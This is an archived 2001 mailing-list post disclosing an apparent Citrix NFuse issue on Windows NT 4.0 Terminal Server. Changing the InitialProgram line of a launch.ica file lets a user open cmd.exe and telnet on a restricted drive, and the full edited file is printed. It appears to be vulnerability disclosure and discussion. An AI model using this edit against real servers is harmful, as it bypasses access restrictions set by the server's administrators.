Your professional opinions are appreciated. About a month ago I had posted the below as a Citrix Client Access Advisory and got several responses to the fact that it either it was not a valid vulnerabilty or that it was a default configuration problem. which may be true. but consider this. The "only allow users to launch published applications" checkbox only works in an environment when you are only serving published applications and not in an environment where you are serving desktops AND applications. You can visually tell by the launch.ica if an nfuse menu is either serving an appy or a desktop (yes?). meaning: a quick binary click session through hyperlinks would reveal whether or not you could use this: ####HERE IS THE POST FROM A MONTH AGO##### Any help here proving this valid/invalid would be hot. I have considerable interest, but limited resources. Thanks! Platform: Windows Terminal Server NT 4.0 Synopsis: Using an IE Web Client and a Linux Citrix ICA client I was able to gain access to executables and files on a restricted drive (c:\). Description: Originally I was changing the application name in an attempt gain access to apps, but when I changed it to #gar I got an error message conveying "The system cannot find the file specified."... which is always an invitation to play. Below is the listed launch.ica file that I used to connect. The only parameter that was changed was the 'InitialProgram='parameter. I simply removed the '#' symbol and it replaced it with a valid application and its path (c:\wtsrv\system32\cmd.exe). I was able to launch cmd.exe, telnet.exe (with arguments), the citrix toolbar, etc. but had no escalation in priveledges. The Citrix ICA Client for Linux was easy enough, since it allows you to create the launch file on the fly... screenshots: Initial error with #gar as an application: http://www.modelm.org/proof.jpg Here is a shot of the edited launch.ica file after execution: http://www.modelm.org/proof1.jpg ------launch.ica--- <!----<[NFuse_setSessionField NFuse_WindowType=closed]>----> [WFClient] Version=2 ClientName= [ApplicationServers]= 30 year old script kiddie= [30 year old script kiddie] Address=citrixpooter:1496 #InitialProgram=v:\Documents and Settings\administrator\desktop\launch.ica InitialProgram=c:\wtsrv\system32\cmd.exe DesiredColor=2 TransportDriver= WinStationDriver=ICA 3.0 Username= Domain= Password= Command= ß--any input here would be fantastic ClientAudio=On ScreenPercent=80 [EncRC5-0] DriverNameWin32=pdc0n.dll [EncRC5-40] DriverNameWin32=pdc40n.dll [EncRC5-56] DriverNameWin32=pdc56n.dll [EncRC5-128] DriverNameWin32=pdc128n.dll ------end launch.ica----- -- --- -sween | M | http://www.modelm.org --- "force feedback computing since 1984." <meta name="MSSmartTagsPreventParsing" content="TRUE">
This archive was generated by hypermail 2b30 : Sun Sep 23 2001 - 10:09:40 PDT